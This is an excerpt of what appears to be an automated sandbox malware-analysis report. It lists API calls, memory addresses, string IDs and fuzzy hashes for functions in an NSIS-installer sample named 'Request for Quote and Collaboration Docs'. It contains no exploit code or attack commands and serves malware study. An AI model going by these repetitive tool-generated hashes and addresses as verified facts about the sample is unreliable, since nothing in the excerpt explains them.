                                                                                          • Associated: 00000005.00000002.2599612827.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599642016.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599657419.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599682680.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599682680.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599682680.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_400000_Request for Quote and Collaboration Docs.jbxd
                                                                                          Similarity
                                                                                          • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                                                          • String ID:
                                                                                          • API String ID: 3294113728-0
                                                                                          • Opcode ID: 120950de23c25218e4c137f2e62925978e01813800c9cf407bd4cdabe4d04e4e
                                                                                          • Instruction ID: c52f99eb37a0f9a93b384f1dc8ea19ce670fa72408cf6cd502fc0ac50d833161
                                                                                          • Opcode Fuzzy Hash: 120950de23c25218e4c137f2e62925978e01813800c9cf407bd4cdabe4d04e4e
                                                                                          • Instruction Fuzzy Hash: AC31A072C00118BBDF11AFA5CE49DAF7E79EF05364F20423AF510762E1C6796E418BA9
                                                                                          APIs
                                                                                          • lstrlenW.KERNEL32(004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 004051CC
                                                                                          • lstrlenW.KERNEL32(00402D94,004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 004051DC
                                                                                          • lstrcatW.KERNEL32(004216B0,00402D94,00402D94,004216B0,00000000,00000000,00000000), ref: 004051EF
                                                                                          • SetWindowTextW.USER32(004216B0,004216B0), ref: 00405201
                                                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405227
                                                                                          • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405241
                                                                                          • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524F
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2599627446.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000005.00000002.2599612827.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599642016.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599657419.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599682680.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599682680.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599682680.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_400000_Request for Quote and Collaboration Docs.jbxd
                                                                                          Similarity
                                                                                          • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                          • String ID:
                                                                                          • API String ID: 2531174081-0
                                                                                          • Opcode ID: aabeaaca48730acbc73074f8e678aaac97ab8e564c9cd04649984117108eee2c
                                                                                          • Instruction ID: f08454111491fc0d39351af24b8902c1f97f976603b555b028d64c931b302e29
                                                                                          • Opcode Fuzzy Hash: aabeaaca48730acbc73074f8e678aaac97ab8e564c9cd04649984117108eee2c
                                                                                          • Instruction Fuzzy Hash: 42219D71900518BACB119FA5DD84ADFBFB8EF44354F54807AF904B62A0C7798A41DFA8
                                                                                          APIs
                                                                                          • DestroyWindow.USER32(?,00000000), ref: 00402D35
                                                                                          • GetTickCount.KERNEL32 ref: 00402D53
                                                                                          • wsprintfW.USER32 ref: 00402D81
                                                                                            • Part of subcall function 00405194: lstrlenW.KERNEL32(004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 004051CC
                                                                                            • Part of subcall function 00405194: lstrlenW.KERNEL32(00402D94,004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 004051DC
                                                                                            • Part of subcall function 00405194: lstrcatW.KERNEL32(004216B0,00402D94,00402D94,004216B0,00000000,00000000,00000000), ref: 004051EF
                                                                                            • Part of subcall function 00405194: SetWindowTextW.USER32(004216B0,004216B0), ref: 00405201
                                                                                            • Part of subcall function 00405194: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405227
                                                                                            • Part of subcall function 00405194: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405241
                                                                                            • Part of subcall function 00405194: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524F
                                                                                          • CreateDialogParamW.USER32(0000006F,00000000,00402C7F,00000000), ref: 00402DA5
                                                                                          • ShowWindow.USER32(00000000,00000005), ref: 00402DB3
                                                                                            • Part of subcall function 00402CFE: MulDiv.KERNEL32(?,00000064,?), ref: 00402D13
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2599627446.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000005.00000002.2599612827.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599642016.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599657419.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599682680.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599682680.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599682680.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_400000_Request for Quote and Collaboration Docs.jbxd
                                                                                          Similarity
                                                                                          • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                                                          • String ID: ... %d%%
                                                                                          • API String ID: 722711167-2449383134
                                                                                          • Opcode ID: 37da5e6e22464c23d40ec4d31b3b8eabf55409bf9acffd0f2ef74a8860773cf4
                                                                                          • Instruction ID: 10fb19a6c4b2eae8d62923eb178f02f9fc5b3c6af7becd3ce095817841e91703
                                                                                          • Opcode Fuzzy Hash: 37da5e6e22464c23d40ec4d31b3b8eabf55409bf9acffd0f2ef74a8860773cf4
                                                                                          • Instruction Fuzzy Hash: 2901A130949220EBD7626B60AF1DAEA3B68EF01704F1445BBF901B11E0C6FC9D01CA9E
                                                                                          APIs
                                                                                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404A79
                                                                                          • GetMessagePos.USER32 ref: 00404A81
                                                                                          • ScreenToClient.USER32(?,?), ref: 00404A9B
                                                                                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404AAD
                                                                                          • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404AD3
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2599627446.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000005.00000002.2599612827.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599642016.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599657419.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599682680.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599682680.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599682680.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_400000_Request for Quote and Collaboration Docs.jbxd
                                                                                          Similarity
                                                                                          • API ID: Message$Send$ClientScreen
                                                                                          • String ID: f
                                                                                          • API String ID: 41195575-1993550816
                                                                                          • Opcode ID: 06f6ebea5bc1d9fbd35e9f77c39338462eb0780e6261c6c1cca29060ed6e4b7a
                                                                                          • Instruction ID: cab112d5f89b67c13374b27971796476edbf79a01bfb7ffc6895eaaae0ed81f2
                                                                                          • Opcode Fuzzy Hash: 06f6ebea5bc1d9fbd35e9f77c39338462eb0780e6261c6c1cca29060ed6e4b7a
                                                                                          • Instruction Fuzzy Hash: 1C014C71E40219BADB00DB94DD85BFEBBB8AB55715F10012ABB11B61C0C7B4A9018BA5
                                                                                          APIs
                                                                                          • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402C9D
                                                                                          • wsprintfW.USER32 ref: 00402CD1
                                                                                          • SetWindowTextW.USER32(?,?), ref: 00402CE1
                                                                                          • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402CF3
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2599627446.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000005.00000002.2599612827.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599642016.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599657419.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599682680.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599682680.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599682680.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_400000_Request for Quote and Collaboration Docs.jbxd
                                                                                          Similarity
                                                                                          • API ID: Text$ItemTimerWindowwsprintf
                                                                                          • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                                                          • API String ID: 1451636040-1158693248
                                                                                          • Opcode ID: 51bd416a2a5802dcebde0e8cf043a9bf389b7035035a475ca1d7752134760d3a
                                                                                          • Instruction ID: 78b67de6d16717a489960d5e53e23e1f77e1f7f38f635152e8b2699b13fa448d
                                                                                          • Opcode Fuzzy Hash: 51bd416a2a5802dcebde0e8cf043a9bf389b7035035a475ca1d7752134760d3a
                                                                                          • Instruction Fuzzy Hash: EAF06270504108ABEF205F50CD4ABAE3768BB00309F00803AFA16B91D0CBF95959DF59
                                                                                          APIs
                                                                                          • GetTickCount.KERNEL32 ref: 00403192
                                                                                            • Part of subcall function 0040330F: SetFilePointer.KERNEL32(00000000,00000000,00000000,00402FE7,?), ref: 0040331D
                                                                                          • SetFilePointer.KERNEL32(00000000,00000000,?,00000000,?,00403095,00000004,00000000,00000000,?,?,?,0040300E,000000FF,00000000,00000000), ref: 004031C5
                                                                                          • WriteFile.KERNEL32(0040BE78,?,00000000,00000000,00413E78,00004000,?,00000000,?,00403095,00000004,00000000,00000000,?,?), ref: 0040327F
                                                                                          • SetFilePointer.KERNEL32(?,00000000,00000000,00413E78,00004000,?,00000000,?,00403095,00000004,00000000,00000000,?,?,?,0040300E), ref: 004032D1
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2599627446.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000005.00000002.2599612827.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599642016.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599657419.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599682680.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599682680.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599682680.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_400000_Request for Quote and Collaboration Docs.jbxd
                                                                                          Similarity
                                                                                          • API ID: File$Pointer$CountTickWrite
                                                                                          • String ID: x>A
                                                                                          • API String ID: 2146148272-3854404225
                                                                                          • Opcode ID: c3e212118fbef9e4adb068f61efe2bd575096358676594393449bc7ea11798d5
                                                                                          • Instruction ID: e2b2982e6b1d623d5d036838b7619e310c478df2cbc778b1b7af49cc7c53be0d
                                                                                          • Opcode Fuzzy Hash: c3e212118fbef9e4adb068f61efe2bd575096358676594393449bc7ea11798d5
                                                                                          • Instruction Fuzzy Hash: 2A41AC72504201DFDB10AF29ED848A63BACFB54315720827FE910B22E0D7799D81DBED
                                                                                          APIs
                                                                                          • CharNextW.USER32(?,*?|<>/":,00000000,00434000,00436800,00436800,00000000,00403332,00436800,76F93420,00403512), ref: 004061E1
                                                                                          • CharNextW.USER32(?,?,?,00000000), ref: 004061F0
                                                                                          • CharNextW.USER32(?,00434000,00436800,00436800,00000000,00403332,00436800,76F93420,00403512), ref: 004061F5
                                                                                          • CharPrevW.USER32(?,?,00436800,00436800,00000000,00403332,00436800,76F93420,00403512), ref: 00406208
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2599627446.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000005.00000002.2599612827.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599642016.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599657419.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599682680.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599682680.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599682680.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_400000_Request for Quote and Collaboration Docs.jbxd
                                                                                          Similarity
                                                                                          • API ID: Char$Next$Prev
                                                                                          • String ID: *?|<>/":
                                                                                          • API String ID: 589700163-165019052
                                                                                          • Opcode ID: bf19904cbb26e83114afcd58bf256c97857e1bb2abc1c9c3e805ea3815cda1ed
                                                                                          • Instruction ID: e0619f79a043cffb4c3b00824a243f33de9385cd0f0c41224b0956f888f04927
                                                                                          • Opcode Fuzzy Hash: bf19904cbb26e83114afcd58bf256c97857e1bb2abc1c9c3e805ea3815cda1ed
                                                                                          • Instruction Fuzzy Hash: 3511C47680021295EB307B548C40BB762F8EF957A0F56403FE996B72C2E77C5C9282BD
                                                                                          APIs
                                                                                          • WideCharToMultiByte.KERNEL32(?,?,0040A580,000000FF,00409D80,00000400,?,?,00000021), ref: 0040252F
                                                                                          • lstrlenA.KERNEL32(00409D80,?,?,0040A580,000000FF,00409D80,00000400,?,?,00000021), ref: 00402536
                                                                                          • WriteFile.KERNEL32(00000000,?,00409D80,00000000,?,?,00000000,00000011), ref: 00402568
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2599627446.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000005.00000002.2599612827.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599642016.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599657419.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599682680.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599682680.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599682680.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_400000_Request for Quote and Collaboration Docs.jbxd
                                                                                          Similarity
                                                                                          • API ID: ByteCharFileMultiWideWritelstrlen
                                                                                          • String ID: 8
                                                                                          • API String ID: 1453599865-4194326291
                                                                                          • Opcode ID: 9598e7bf0115d7b54bac2ba601592103c37d762dad4affe4391b543117dffca7
                                                                                          • Instruction ID: b6741c74acf97665735c623be1ff62c12e58b25bca11cb73faf7774dd427f28f
                                                                                          • Opcode Fuzzy Hash: 9598e7bf0115d7b54bac2ba601592103c37d762dad4affe4391b543117dffca7
                                                                                          • Instruction Fuzzy Hash: A5019671A44204FBD700AFA0DE49EAF7278AB50319F20053BF102B61D2D7BC5D41DA2D
                                                                                          APIs
                                                                                          • lstrcatW.KERNEL32(00000000,00000000,00409580,00435000,?,?,00000031), ref: 00401793
                                                                                          • CompareFileTime.KERNEL32(-00000014,?,00409580,00409580,00000000,00000000,00409580,00435000,?,?,00000031), ref: 004017B8
                                                                                            • Part of subcall function 00405EEA: lstrcpynW.KERNEL32(?,?,00000400,004033C8,004281E0,NSIS Error), ref: 00405EF7
                                                                                            • Part of subcall function 00405194: lstrlenW.KERNEL32(004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 004051CC
                                                                                            • Part of subcall function 00405194: lstrlenW.KERNEL32(00402D94,004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 004051DC
                                                                                            • Part of subcall function 00405194: lstrcatW.KERNEL32(004216B0,00402D94,00402D94,004216B0,00000000,00000000,00000000), ref: 004051EF
                                                                                            • Part of subcall function 00405194: SetWindowTextW.USER32(004216B0,004216B0), ref: 00405201
                                                                                            • Part of subcall function 00405194: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405227
                                                                                            • Part of subcall function 00405194: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405241
                                                                                            • Part of subcall function 00405194: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524F
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2599627446.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000005.00000002.2599612827.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599642016.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599657419.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599682680.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599682680.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599682680.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_400000_Request for Quote and Collaboration Docs.jbxd
                                                                                          Similarity
                                                                                          • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                          • String ID:
                                                                                          • API String ID: 1941528284-0
                                                                                          • Opcode ID: f5fb99fc77cb499af78de08433a29d52c657005603a562d7fa302922f95013b5
                                                                                          • Instruction ID: bc5e94bc6114b027384bbb583ab77f55914405742357509a7a45d2f14902e26b
                                                                                          • Opcode Fuzzy Hash: f5fb99fc77cb499af78de08433a29d52c657005603a562d7fa302922f95013b5
                                                                                          • Instruction Fuzzy Hash: 0541A071900515BACF10BBB5CC46DAF7A78EF05368B20863BF521B11E2D73C8A419A6E
                                                                                          APIs
                                                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00402B9B
                                                                                          • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402BD7
                                                                                          • RegCloseKey.ADVAPI32(?), ref: 00402BE0
                                                                                          • RegCloseKey.ADVAPI32(?), ref: 00402C05
                                                                                          • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402C23
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2599627446.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000005.00000002.2599612827.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599642016.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599657419.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599682680.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599682680.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599682680.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_400000_Request for Quote and Collaboration Docs.jbxd
                                                                                          Similarity
                                                                                          • API ID: Close$DeleteEnumOpen
                                                                                          • String ID:
                                                                                          • API String ID: 1912718029-0
                                                                                          • Opcode ID: 91a0cc9b62795f3a8a15dda2708214bc4454f5c9052d466bcbd9eea0ad329b5b
                                                                                          • Instruction ID: ada95b61e8ad34ac3bb2ad29be3e5f3f7733698153a8948b25f67961a2a4c07b
                                                                                          • Opcode Fuzzy Hash: 91a0cc9b62795f3a8a15dda2708214bc4454f5c9052d466bcbd9eea0ad329b5b
                                                                                          • Instruction Fuzzy Hash: 2E113D7190400CFEEF21AF90DE89DAE3B79EB54348F10447AFA05B10A0D3759E51EA69
                                                                                          APIs
                                                                                          • GetDlgItem.USER32(?,?), ref: 00401CEB
                                                                                          • GetClientRect.USER32(00000000,?), ref: 00401CF8
                                                                                          • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D19
                                                                                          • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D27
                                                                                          • DeleteObject.GDI32(00000000), ref: 00401D36
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2599627446.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000005.00000002.2599612827.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599642016.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599657419.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599682680.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599682680.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599682680.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_400000_Request for Quote and Collaboration Docs.jbxd
                                                                                          Similarity
                                                                                          • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                          • String ID:
                                                                                          • API String ID: 1849352358-0
                                                                                          • Opcode ID: 548b7988845d34974c7096401ec02f3577b62e53f99ad47469e6fcf51543f742
                                                                                          • Instruction ID: 62a37a396924b9b833916b179176740e0848b2f5cedec3081aefe4e9105dc113
                                                                                          • Opcode Fuzzy Hash: 548b7988845d34974c7096401ec02f3577b62e53f99ad47469e6fcf51543f742
                                                                                          • Instruction Fuzzy Hash: F0F0E1B2A04104BFDB01DBE4EE88DEEB7BCEB08305B104466F601F5190C674AD018B35
                                                                                          APIs
                                                                                          • GetDC.USER32(?), ref: 00401D44
                                                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D51
                                                                                          • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D60
                                                                                          • ReleaseDC.USER32(?,00000000), ref: 00401D71
                                                                                          • CreateFontIndirectW.GDI32(0040BD88), ref: 00401DBC
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2599627446.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000005.00000002.2599612827.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599642016.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599657419.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599682680.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599682680.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599682680.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_400000_Request for Quote and Collaboration Docs.jbxd
                                                                                          Similarity
                                                                                          • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                          • String ID:
                                                                                          • API String ID: 3808545654-0
                                                                                          • Opcode ID: 6de236fac86f4cc62a0a7bf8fa179f1b370f6b686e9a3dedb6aaee9d500d3606
                                                                                          • Instruction ID: 3b80acf522b7bf2f021413e8febbbf72b8f641a50adb0d53ac9f1aa9edf06097
                                                                                          • Opcode Fuzzy Hash: 6de236fac86f4cc62a0a7bf8fa179f1b370f6b686e9a3dedb6aaee9d500d3606
                                                                                          • Instruction Fuzzy Hash: DF01D131948280AFEB016BB0AE0BB9ABF74DF95301F144479F245B62E2C77914049F7E
                                                                                          APIs
                                                                                          • SetFilePointer.KERNEL32(00409230,00000000,00000000,00000000,00000000,?,?,?,0040300E,000000FF,00000000,00000000,00409230,?), ref: 00403088
                                                                                          • WriteFile.KERNEL32(00000000,00413E78,?,000000FF,00000000,00413E78,00004000,00409230,00409230,00000004,00000004,00000000,00000000,?,?), ref: 00403115
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2599627446.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000005.00000002.2599612827.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599642016.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599657419.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599682680.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599682680.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599682680.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_400000_Request for Quote and Collaboration Docs.jbxd
                                                                                          Similarity
                                                                                          • API ID: File$PointerWrite
                                                                                          • String ID: x>A
                                                                                          • API String ID: 539440098-3854404225
                                                                                          • Opcode ID: b27c88111c9479bfc016d655c0b2bfb1ccfb1f1bf46317cd24110ceb5cc412c0
                                                                                          • Instruction ID: dc2c699ff297b31fb9e84695071232237a0836a1395088a2783af72dccbdbb3b
                                                                                          • Opcode Fuzzy Hash: b27c88111c9479bfc016d655c0b2bfb1ccfb1f1bf46317cd24110ceb5cc412c0
                                                                                          • Instruction Fuzzy Hash: A8312871500219EBDF10CF65EC44AAA3FBCEB08755F20813AF905AA1A0D3349E50DBA9
                                                                                          APIs
                                                                                          • lstrlenW.KERNEL32(004226D0,004226D0,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,0000040F,00000400,00000000), ref: 00404A09
                                                                                          • wsprintfW.USER32 ref: 00404A12
                                                                                          • SetDlgItemTextW.USER32(?,004226D0), ref: 00404A25
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2599627446.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000005.00000002.2599612827.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599642016.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599657419.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599682680.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599682680.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599682680.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
